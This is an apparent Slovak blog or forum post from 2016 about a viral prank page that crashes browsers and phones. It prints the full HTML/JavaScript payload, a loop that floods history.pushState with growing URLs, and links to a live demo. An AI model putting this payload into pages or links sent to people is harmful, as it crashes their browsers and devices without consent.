|
|
Zverejnené 22. 1. 2016 11:36:39
|
|
|
|
Príčinou incidentu je toto, že zahraničný priateľ z Cyber Security zverejnil na Twitteri takýto tweet:
Tento chlapík tvrdí, že ak použijete vyššie uvedený 12-riadkový Javascrip{filter}t kód, môžete zrútiť Firefox, Chrome, Safari prehliadače a tiež spôsobiť reštart vášho iPhonu a pád Android telefónu!
Celý HTML kód je nasledovný:
- <html>
- <head>
- <meta charset="utf-8">
- <title>谁点谁怀孕</title>
- </head>
- <body>
- 恭喜你,你已经怀孕了!
- <scrip{过滤}t>
- var total="";
- for (var i=0;i<1000000;i++)
- {
- total= total+i.toString();
- history.pushState(0,0,total);
- }
- </scrip{过滤}t>
- </body>
- </html>
Ak ste používateľ PC, po kliknutí na odkaz je veľmi pravdepodobné, že pamäť CPU počítača prudko stúpne, až kým prehliadač nespadne a nezamrzne...
Ak ste používateľ mobilu (Android, iPhone), váš prehliadač spadne po kliknutí na odkaz! Kliknutie na odkaz na Weibo a WeChat tiež spadne.
Prečo sa to deje? V tomto ohľade som našiel odpoveď od boha menom "Xiaomi" na Zhihu:
history.pushstate() je API zavedené HTML5, pushState pridáva špecifikovanú URL do histórie prehliadača a ukladá aktuálny bod histórie. Keď i<100000, celkový počet sa zaznamenáva v histórii prehliadača cyklickým spôsobom a ak sa opakuje príliš často, prehliadač to nezvládne a prirodzene spadne.
No, každopádne, ani neviem vymyslieť "hello world", takže tomu vôbec nerozumiem... Stručne povedané, je to akurát na to, aby ste vyhodili oblohu do vzduchu!
Ak to chcete vyskúšať, kliknite sem: http://www.itsvse.com/demo.html
|
Predchádzajúci:[Open Source] Wooyun Vulnerability Query Platform Zdrojový kód plus databáza asp.net verziaBudúci:Linux config/configure/Configure, make, make test/make check, sudo make in...
|
